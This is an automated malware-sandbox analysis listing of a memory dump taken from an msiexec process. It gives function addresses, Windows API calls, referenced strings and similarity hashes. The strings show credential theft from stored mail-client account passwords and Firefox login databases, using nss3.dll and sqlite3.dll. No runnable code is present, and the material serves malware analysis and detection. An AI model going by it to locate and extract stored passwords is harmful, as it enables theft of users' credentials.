                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                      • String ID:
                                                                      • API String ID: 4165544737-0
                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                      APIs
                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                      • API String ID: 3963849919-1658304561
                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@memcpymemset
                                                                      • String ID: (yE$(yE$(yE
                                                                      • API String ID: 1865533344-362086290
                                                                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                      APIs
                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                      • memset.MSVCRT ref: 0040E736
                                                                      • memset.MSVCRT ref: 0040E74F
                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                      • memset.MSVCRT ref: 0040E858
                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                      • API String ID: 4171719235-3943159138
                                                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                      • GetDC.USER32 ref: 004104E2
                                                                      • strlen.MSVCRT ref: 00410522
                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                      • sprintf.MSVCRT ref: 00410640
                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                      • String ID: %s:$EDIT$STATIC
                                                                      • API String ID: 1703216249-3046471546
                                                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004024F5
                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,67CA7B60,?,00000000), ref: 00402533
                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy$QueryValuememset
                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                      • API String ID: 168965057-606283353
                                                                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                      • memset.MSVCRT ref: 0040128E
                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                      • String ID:
                                                                      • API String ID: 2998058495-0
                                                                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                      APIs
                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp$memcpy
                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                      • API String ID: 231171946-2189169393
                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                      • API String ID: 633282248-1996832678
                                                                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: sprintf$memset$_mbscpy
                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                      • API String ID: 3402215030-3842416460
                                                                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                      APIs
                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                      • strlen.MSVCRT ref: 0040F139
                                                                      • strlen.MSVCRT ref: 0040F147
                                                                      • memset.MSVCRT ref: 0040F187
                                                                      • strlen.MSVCRT ref: 0040F196
                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                      • strlen.MSVCRT ref: 0040F207
                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                      • API String ID: 2003275452-3138536805
                                                                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                      • API String ID: 1012775001-1343505058
                                                                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00444612
                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                      • strlen.MSVCRT ref: 0044462E
                                                                      • memset.MSVCRT ref: 00444668
                                                                      • memset.MSVCRT ref: 0044467C
                                                                      • memset.MSVCRT ref: 00444690
                                                                      • memset.MSVCRT ref: 004446B6
                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                      Strings
                                                                      Memory Dump Source
